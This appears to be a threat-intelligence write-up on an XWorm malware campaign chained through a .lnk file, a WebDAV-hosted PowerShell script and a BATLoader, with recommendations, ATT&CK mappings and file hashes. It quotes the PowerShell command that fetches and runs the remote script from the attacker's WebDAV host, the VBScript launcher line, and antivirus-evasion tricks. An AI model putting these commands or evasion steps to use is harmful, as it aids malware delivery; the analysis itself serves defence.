Threat Actors Leveraging WebDAV Servers for Covert Operations

  Threat Actors (TAs) frequently utilize multistage attacks to increase the likelihood of successfully delivering malicious payload by evading detection from antivirus products and creating a complex and intricate attack structure that poses challenges for analysis. The TAs commonly employ LOLBin (Living Off the Land Binary) in the multistage attack. The LOLBins refer to legitimate system binaries that TAs misuse to execute malicious actions without arousing suspicion. PowerShell.exe, Wscript.exe, wmic.exe, and regsvr32.exe are among the most commonly utilized LOLBins in Windows operating systems by TAs. Cyble Research and Intelligence Labs (CRIL) analyzed a novel method of spreading the XWorm malware, which involves a multistage attack to deliver its payload using LOLBins. This sample was first brought to attention by abuse.ch, who tweeted about its discovery.

The initial phase of the attack originates from a .lnk file named “Invoice_7729839_PDF.lnk.” Given the filename, it is suspected that the .lnk file may have been distributed to users through spam emails. Upon opening the .lnk file, it executes malicious PowerShell content hosted on a WebDAV server provided by “TheDriveHQ,” a cloud-based file storage service. This remotely hosted PowerShell code is responsible for downloading a .zip file containing a loader. The loader is designed to inject the XWorm code into a running process, facilitating the further spread of the malware. The figure below shows the worm’s new infection chain.

 

Technical analysis

Upon executing the .lnk file, it triggers the launch of a PowerShell process with the “ExecutionPolicy Bypass” option. The process attempts to access a remote PowerShell script named “sh.ps1” from a web server (\dhqid3b4b9u6ecv6jcxva0f[.]webdav[.]drivehq[.]com) using the WebDAV protocol. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass \\dhqid3b4b9u6ecv6jcxva0f[.]webdav.drivehq[.]com@SSL\DavWWWRoot\sh[.]ps1 Upon successful access, the PowerShell script triggers the execution of the remote script “sh.ps1.” This remote script, in turn, initiates the download of a zip file containing a batch script named “sh.bat” to the victim’s machine. The “sh.bat” batch script is executed on the victim’s machine after the download. The newly launched batch script is the primary loader for the final payload to get delivered into the system. This loader utilizes a distinctive method to deliver the malicious payload to the user system. We have recently seen multiple malware families delivered using this BATLoader technique and have analyzed the same. Unlike the previous delivery technique used by the XWorm malware, which depended on .pdfs, documents, and executables, this attack employed a multi-file approach, incorporating .ps1, .vbs, and .bat files.

BATLoader

  The below figure shows the content of the BAT file downloaded from the webserver.

  Upon execution of the BAT file, it copies the legitimate “PowerShell.exe” from the “System32” directory and places it in the present working directory where the BAT file is executed. To evade detection, the copied “PowerShell.exe” file is given a different name other than PowerShell.exe with the “.scr” extension. Subsequently, the newly generated PowerShell.exe executes the obfuscated PowerShell code embedded within the BAT file, as shown in the figure below.

  Furthermore, the BAT file drops two additional files in the %AppData% folder “C:\Users\[User Profile]\AppData\Roaming“. One of these files is a self-copy of the original BAT file with a randomly generated name, while the other is a VBScript. The image below shows the dropped files in the %Appdata% folder.

  Once the files are dropped in the specified location, the BAT file executes the VBscript. The VBscript has minimal functionality and primarily serves to run the self-copied BAT file from the same location. The contents of the .vbs file are as follows: CreateObject(“Shell.Application”).ShellExecute “””C:\Users\[user profile]\AppData\Roaming\hDbJVbiqOn.cmd”””, “”, “”, “open”, 2 Unlike previous BATLoader variants that executed the BAT file directly, this particular case employs VBScript to run the BAT file, effectively evading detection by Antivirus products. The figure below shows the infection chain of new and old variants of BATLoader spreading XWorm.

  As previously mentioned, the BAT file contains obfuscated content. However, after deobfuscating the code, it becomes clear that the content employs a familiar BATLoader technique observed in other malware families. This technique involves using AES decryption operations and loading assemblies using the PowerShell script. The deobfuscated content is shown in the figure below.

 

Final Payload – XWorm

  XWorm is classified as commodity malware, designed to be readily accessible to TAs, even those with limited technical expertise, who can purchase and utilize it for various cybercrimes. This versatile malware has a wide array of capabilities, including stealing sensitive data, executing Distributed Denial of Service (DDoS) attacks, acting as a clipper to alter cryptocurrency addresses, deploying ransomware, and downloading additional malware into the compromised system, etc. Cyble has conducted a comprehensive analysis of XWorm and previously shared insights on this malware in our blog. XWorm Version 4.2 is presently being offered by the TAs for $400 for a lifetime subscription, as shown below.

  According to the TA’s claims, XWorm Version 4.2 has the following features:

 

Conclusion

  The analysis of the XWorm malware and its weaponization techniques reveals a concerning trend in cyberattacks. TAs are increasingly turning to LOLBins and legitimate software as vehicles to deliver their malicious payloads onto the victim’s system. The multistage attack chain employed by XWorm, coupled with its utilization of WebDAV servers for code execution and downloads, emphasizes the importance of robust cybersecurity strategies. Gaining a thorough understanding of this distinctive attack chain becomes paramount in devising effective mitigation measures to safeguard against XWorm and other similar malware in the future. Cyble Research and Intelligence Labs continues to monitor the activity of XWorm and other malware and will provide timely updates to our readers.

Recommendations

 

• The initial infection may happen via spam emails or phishing websites, so enterprises should use security products to detect phishing emails and websites.
• Refrain from opening untrusted links and email attachments without first verifying their authenticity.
• Monitor the beacon on the network level to block data exfiltration by malware or TAs.
• Turn on the automatic software update feature on your computer, mobile, and other connected devices.
• Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
• Educate employees on protecting themselves from threats like phishing/untrusted URLs.

MITRE ATT&CK® Techniques

 

Tactic	Technique ID	Technique Name
Initial Access	T1566	Spearphishing Attachment
Execution	T1204 T1059	User Execution Command and Scripting Interpreter
Defense Evasion	T1140	Deobfuscate/Decode Files or Information
Command and Control	T1071	Application Layer Protocol

Indicators of Compromise (IOCs)

 

Indicators	Indicator Type	Description
a19a8e6782f0008c3b10276c764962f6f27b27754d826f8d3679ef15bea122d5	SHA256	Lnk file
9587ef7ba7dfe745e4c98f724110382b7b53f5f7781d1d3fcfc910abacb3fbb8	SHA256	BATLoader
b64ed641eafbae33d195864576629ae9e922948b59d9f7e6f4fcaafebcc1b1ca	SHA256	XWorm malware